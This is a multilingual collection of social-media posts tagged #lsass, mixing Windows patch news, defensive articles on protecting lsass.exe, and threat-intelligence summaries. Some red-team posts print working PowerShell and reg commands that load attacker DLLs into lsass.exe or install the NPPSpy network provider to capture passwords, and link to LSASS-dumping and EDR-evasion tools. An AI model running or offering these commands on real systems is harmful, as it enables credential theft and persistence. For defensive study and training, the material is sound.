Microsoft stycznia 2026 – Krytyczne łatki, zero-day i pilne aktualizacje

Czy CVSS 5. 5 może być pilniejsze niż „krytyk”?

Czytaj dalej:
https://pressmind.org/microsoft-stycznia-2026-krytyczne-atki-zero-day-i-pilne-aktualizacje/

#PressMindLabs #cve202620805 #lsass #microsoft #patchtuesday #protectedview

Сдвиг парадигмы в безопасности серверов: как мы пережили Windows Server 2025 и сделали инфраструктуру крепче

Мы поймали странный «обрыв» доступа к нескольким NAS и старому принтер-серверу. В логе — ничего драматического: «не получилось договориться по безопасности». Виноват оказался не «прокси/файрвол», а новая норма безопасности : клиент Windows Server 2025 уже требует подпись SMB-пакетов . Всё, что не умеет — идёт мимо кассы. В тот же месяц у коллег «ложилась» интеграция, ретранслирующая NTLM на LDAP, — и снова не сеть виновата. LDAP-подпись и привязка канала (channel binding) перестали считать ретрансляцию чем-то приемлемым. Зато после шторма заметно стихло количество «подозрительных» попыток бокового смещения. Мораль простая: реактивная модель «ставим патчи и надеемся» больше не тянет . Нужен проактивный дизайн — с нормами безопасности, которые не нужно «включать по желанию», а которые уже встроены в дефолт .

https://habr.com/ru/articles/948976/

#windows_server_2025 #active_directory #SMB_signing #LDAP_signing #kerberos #ntlm #AD_CS #laps #credential_guard #lsass

Different ways to dump LSASS

Guide to dumping lsass: Task Manager, comsvcs MiniDump, procdump, MiniDumpWriteDump, handle steal, PssCaptureSnapshot, SilentProcessExit.

https://github.com/yo-yo-yo-jbo/dumping_lsass/

#LSASS

Защита процесса lsass от credential dumping

Процесс lsass.exe (Local Security Authority Subsystem Service) — критически важный компонент ОС Windows. Он отвечает за аутентификацию пользователей и управление учетными данными. В его памяти хранятся хэши паролей NTLM, билеты Kerberos, данные сессий, а в некоторых конфигурациях — даже пароли в открытом виде, если используется устаревший протокол WDigest. Столь высокая концентрация секретов делает lsass.exe лакомой целью для злоумышленников, получивших доступ к системе. После Initial Access фазы атакующий будет стремиться повысить привилегии и двигаться дальше по сети. Дамп памяти lsass.exe — самый прямой и часто самый простой способ достичь этих целей, поскольку при отсутствии защиты атакующий очень легко извлекает оттуда данные для проведения атак Pass-the-hash и Pass-the-ticket. В то же время, для атаки на незащищенный lsass.exe, нужно сравнительно немного: права локального администратора и Mimikatz. Таким образом, защиту этого процесса, по моему мнению, нужно внести в базовый набор мероприятий для любой инфраструктуры с Windows-машинами. Существуют различные методы получения дампа lsass.exe. В материале мы рассмотрим как тривиальные, так и более изощренные, но не с позиции атакующего. Поскольку основная часть материала будет посвящена методам защиты lsass от извлечения данных, знакомство с различными способами атаки будет играть вспомогательную роль для лучшего понимания механики защитных мер.

https://habr.com/ru/companies/first/articles/943490/

#lsass #mimikatz #credentials

#red_team #lsass #hacking

Существуют также специфичные ключи реестра.

Первый — `LSASS Driver`. Это недокументированное значение реестра, в которое можно засунуть библиотеку и она будет загружена в процесс `lsass.exe`.

```ps1
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\windows\system32\1.dll"
```

- https://github.com/oxfemale/LogonCredentialsSteal .

Также `LsaExtensionConfig`:

```reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LsaExtensionConfig\Interfaces\1002
```

- https://github.com/Maldev-Academy/LsassHijackingViaReg

Наконец, существует возможность злоупотребления службой `KeyISO` для подгрузки библиотеки в процесс lsass.exe, этот метод описывал itm4n в статье (https://itm4n.github.io/ghost-in-the-ppl-part-1/).

#red_team #lsass #hacking

Диспетчер УД

```ps1
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue

New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll"
```

Подробнее:
- https://xakep.ru/2023/03/15/windows-password;
- https://habr.com/ru/articles/709128/ - проект по отслеживанию изменения пароля пользователей.

#red_team #lsass #hacking

- https://github.com/mdsecactivebreach/DragonCastle - загрузка через RPC + python-обвязка для использования с Kali Linux.

Помимо `Security Packages`, вы можете грузить `Authentication Packages`, `Notification Packages` и компоненты диспетчера учётных данных. Последний способ уже не работает на современных системах. Также не существует отдельного API-вызова , требуется править реестр и перезагружать систему.

Затронуты следующие ключи реестра:

`Authentication Packages`

```cmd
reg add hklm\system\currentcontrolset\control\lsa\ /v "Authentication Packages" /d "msv1_0"\0"fulllegit" /t REG_MULTI_SZ
```

`Notification Packages`

```cmd
reg add "hklm\system\currentcontrolset\control\lsa" /v "notification packages" /d scecli\0evilpwfilter /t reg_multi_sz
```

Как внедряться в lsass.exe

#red_team #lsass #hacking

Стандартные методы внедрения DLL: `SideLoading`, `Search Order Hijacking` и т.п.

Рассмотрим методы внедрения DLL характерные для `lsass.exe`.

`Custom SSP`. Техника позволяет загрузить собственный `Security Package` в адресное пространство процесса `lsass.exe`. Плюс - в возможности загрузки библиотеки без перезагрузки целевого устройства через вызов `AddSecurityPackage()` (https://learn.microsoft.com/en-us/windows/win32/api/sspi/nf-sspi-addsecuritypackagea).

Код и подробный разбор:
- https://blog.xpnsec.com/exploring-mimikatz-part-2/ - анализ `Security Packages`;
- https://xakep.ru/2023/03/15/windows-password/ - подробный разбор механизма аутентификации в Windows;
- https://snovvcra.sh/2024/05/19/from-dll-side-load-to-malicious-ssp.html - кейс с загрузкой вредоносного `SSP`;
- https://github.com/jas502n/mimikat_ssp - загрузка через метод `SspirCallRpc()`;

#Windows #UnderAttack: #0day #vulnerability used by #ransomware group

https://www.ghacks.net/2025/04/09/windows-under-attack-0-day-vulnerability-used-by-ransomware-group/?utm_source=mas.to&utm_medium=social&utm_campaign=&utm_term=&utm_content=&utm_referrer=https%3A%2F%2Fmas.to%2F%40KNTRO&utm_id=&utm_creative=&utm_channel=mastodon_organic&utm_platform=desktop&utm_location=argentina&utm_language=es-ar&utm_variant=

#0DayVulnerability #ZeroDay #ZeroDayVulnerability #Windows10 #Windows11 #WindowsServer #WindowsServer2025 #CVE202529824 #CVE_2025_29824 #CommonLogFileSystem #CLFS #Storm2460 #Storm_2460 #RansomEXX #MSBuild #PipeMagic #LSASS #LSASSMemory

LDAPNightmare PoC Exploit Crashes LSASS and Reboots Windows Domain Controllers
https://thehackernews.com/2025/01/ldapnightmare-poc-exploit-crashes-lsass.html

#Infosec #Security #Cybersecurity #CeptBiro #LDAPNightmare #PoCExploit #LSASS #WindowsDomainControllers

Etwas Hacking für Zwischendurch: Ein LSASS Dump unterhalb des Radars typischer Snakeoil AV und EDRs erstellen.

https://codeberg.org/tomas-jakobs/lsass-dump

#Freebasic #LSASS #Hacking #Codeberg

Windows Downdate – atak na w pełni „zaktualizowany” system eksploitami sprzed lat

Ukazał się raport opisujący nową technikę ataku na systemy Windows zwaną „Windows Downdate”: Aktualizacje są jednym z kluczowych procesów pozwalających na zapewnienie bezpieczeństwa wykorzystywanych systemów. Kolejne poprawki mają na celu między innymi usunięcie podatności wykrytych od czasu wydania poprzedniej aktualizacji. Chociaż systemy operacyjne wciąż mają wiele do nadrobienia, to ich...

#Aktualności #WBiegu #Blackhat #Exploit #Lsass #Patch #Update #Upgrade #Windows

https://sekurak.pl/windows-downdate-atak-na-w-pelni-zaktualizowany-system-eksploitami-sprzed-lat/

Охота за кредами

Существуют различные способы аутентификации в системах Windows, каждый из этих способов сохраняет или кэширует переданные учетные данные. В этом модуле мы рассмотрим основные типы аутентификации и места кэширования переданных данных, а также разберем, как можно получить к ним доступ.

https://habr.com/ru/articles/806831/

#CredentialAccess #SAM #LSA #lsass #NTDSDIT #mimikatz #windows #active_directory #redteam #pentest

Microsoft has quickly released emergency updates to fix a critical memory leak vulnerability in some Windows Server domain controllers. This issue affects the Local Security Authority Subsystem Service (LSASS) when handling Kerberos authentication requests, potentially leading to domain controller failure over time. The updates are cumulative and replace any previous updates for the affected operating systems. They are available for Windows Server 2022, 2016, and 2012 R2, with an update for Windows Server 2019 expected soon. Microsoft urges IT administrators to apply these out-of-band updates as soon as possible, especially if the March 2024 monthly rollup hasn't been installed yet.

https://learn.microsoft.com/en-us/windows/release-health/windows-message-center

#cybersecurity #microsoft #windowsserver #lsass #kerberos #vulnerability

“Bypassing windows defender and ppl protection with pplblade to dump lsass without detection” #lsass #redteam #offensivesecurity #cybersecurity #informationsecurity

https://tacticaladversary.io/adversary-tactics/bypass-defender-and-ppl-protection-to-dump-lsass/

Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

50 Methods For LSASS Dump

#LSASS #pentest #hacking

Source:
https://redteamrecipe.com/50-Methods-For-Dump-LSASS/

RAW:
https://github.com/elementalsouls/DumpLSASS/blob/main/50_Methods%20for%20LSASS%20Dump.png

#windows #lasss #dump #methods

"Injecting pc.dll into LSASS as a Security Package. Security Packages are used to extend the Windows authentication mechanism and can be abused to execute malicious code in the context of LSASS" - I was today years old when I learned this!

https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/

#security #S1 #LSASS #defenseevasion #apt

TIL about #LSASS and #vdigest basically storing passwords in plain text and I'm crying.

“New PostDump version include C# / .NET implementation of the famous NanoDump's NanoDumpWriteDump function, which permit to dump most important #Lsass modules only” #redteam #offensivesecurity #cybersecurity #infosec
https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump